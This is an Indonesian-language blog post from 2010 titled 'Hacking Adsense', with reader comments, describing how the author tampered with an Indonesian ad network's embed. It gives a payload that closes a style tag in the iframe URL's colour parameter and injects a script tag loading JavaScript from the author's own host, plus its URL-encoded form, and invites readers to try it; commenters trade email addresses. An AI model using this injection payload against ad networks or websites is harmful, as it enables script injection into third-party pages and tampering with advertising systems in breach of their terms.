Sabtu, 24 Juli 2010

Hacking Adsense (Memanipulasi Klik Pengunjung)

Bookmark and Share

Ok, begini langsung to the poin aja..
Awalnya begini, web gw walapun nggak punya PR tapi termasuk web dalam kategori trafic tinggi dalam kunjungan. Kebanyakan pengunjung bila gw lihat dari reffernya berasal dari situs google. Suatu hari gw iseng iseng masangin salah satu adsense dari indonesia. Yg buat gw heran neh, bila gw lihat hasilnya di earning selalu saja menunjukkan angka yang sedikit perharinya, padahal seperti yg gw katakan, web gw tuh termasuk web yang banyak dikunjungi. Dari log yg gw buat sendiri, paling sedikit dalam sehari ada sekitar 300 ip adress yang berbeda.

Gw betanya-tanya, masa sih dari sekian banyak pengunjung nggak ada satupun yang ngeklik iklan yang ada di web gw?????

Akhirnya dg sedikit nakal gw mengutak atik script yg diberikan adsense tsb, tujuannya cuma satu: gw ingin juga dapat mengontrol (melihat) pengunjung web gw yg melakukan klik di iklan pd web gw.
Gw lihat celahnya sangat besar untuk melakukan itu, karena adsense tsb dalam mengatur/mengkonfigurasi iklan yg ditayangkan tidak didasarkan pada database, melainkan pada paramater URL yang dihasilkan lewat javascript yg dibuat. Nah di parameter URL itulah gw sisipi script (istilah kerennya phising), yang inti cara kerjanya adalah : Bila link dalam adsense tersebut di klik oleh siapapun maka sebelum halaman web berpindah maka script gw dieksekusi terlebih dulu. Setelah script gw dieksekusi, maka dia akan memberitahu ke file php yg gw siapin sebelumnya lewat metode ajax. Isi file php tersebut hanya mencatat IP adres siapapun yg melakukan klik beserta alamat URL tujuan yang di klik. Di sini gw melakukan filter : tidak boleh ada ip adress yg sama melakukan klik atas alamat adsense yg sama.
Hasilnya ...???

Wauw.. sangat berbeda jauh dengan apa yg ditampilin oleh adsense tsb atas klik yg gw peroleh. Hahaha gw yg kena kibul atau gw melanggar aturan ya.....
Akhirnya gw langsung buang script dari adsense tersebut, untung di dia.. rugi di guwa lah kalo gini caranya terus terusan. Jadi begitu ya caranya, apa dipikir mentang mentang sudah ditaruh pakai metode iframe lantas kita nggak bisa mengontrol...???

oke, gini caranya nya: misalnya di URL yg dihasilkan script untuk mengkases iframe tertulis : httpx://xxxx.com?id=zcvdcasdcs&font=fffff&bacground=000000&border=0000C
->perhatikan bagian yg bold.
diakhir bagian yg di bold kita tambahkan : }</style><script type=text/javascript src=httpx://lokasi_script_gw.js></script><style type=text/css>

Artinya: bagian warna merah adalah untuk mengakhiri tag bacground=000000, warna biru adalah tag javascript dan menunjukkan lokasi dimana lokasi js kita disimpan, warna hijau adalah untuk meneruskan tag style css yang sebelumnya kita tutup pakai warna biru.

Tapi ingat, nanti dihalaman web kita nulisnya nanti jadi begini : }%3C/style%3E%3Cscript%20type=text/javascript%20src=httpx://lokasi_script_gw.js%3E%3C/script%3E%3Cstyle%20type=text/css%3E ..

Sementara sampe sini dulu, selamt mencoba


Artikel yang berhubungan



5 komentar:

codejustfree mengatakan...

wwuuw.. coba ah.. tapi gak melanggar tos kan sob..

junkelse mengatakan...

tentunya gak melanggar sob.. soal nya saya coba.. ntar saya print scren berapa yang uda saya dapat ke email anda jika gak percaya..

share email nya ya..

codejustfree mengatakan...

wah hebat dong.

ni email gua codejustfree@yahoo.com

di tunggu ya

junkelse mengatakan...

akan segera di kirim sob..
:)

Unknown mengatakan...

boleh imel gue juga boss... cyberplayer@ymail.com

Posting Komentar

Followers


junkelse by Junkelse. Powered by Blogger and Supported by kuchino.blogspot.com